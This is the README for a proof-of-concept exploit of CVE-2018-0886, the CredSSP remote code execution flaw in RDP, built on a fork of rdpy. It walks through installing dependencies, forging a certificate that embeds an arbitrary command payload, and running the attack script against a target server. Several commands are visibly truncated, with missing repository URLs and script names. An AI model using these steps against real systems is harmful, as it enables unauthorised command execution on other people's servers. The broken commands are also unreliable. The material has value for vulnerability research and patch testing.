This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only. It relies on a fork of the rdpy project(, allowing also credssp relay.
Written by Eyal Karni, Preempt [email protected]
If you are using Ubuntu 14 , check the install file.. It was tested on Ubuntu 16.04.
$ git clone rdpy
$ git clone
$ cd credssp/install
$ sh
$ cd ../../rdpy
$ sudo python install
- It assumes a pretty clean inital state. Best to uninstall first relevant components such as cryptography, pyopenssl maybe (pip uninstall cryptography).
- A different version of openssl needed to be installed for this to run successfully. The install script does that.
- Please follow the instructions in the described order.
Export a certificate suitable for Server Authentication from any domain. (It is used for RDP
To generate a certificate that exploits the vulnerability(contains the payload),use:
$ python credssp/bin/ -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert is the exported certificate from step 1. exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script:
$ python /usr/local/bin/ -k exploitk.pem -c exploitc.pem TargetServer
More details are in the usage section of the scripts(--help).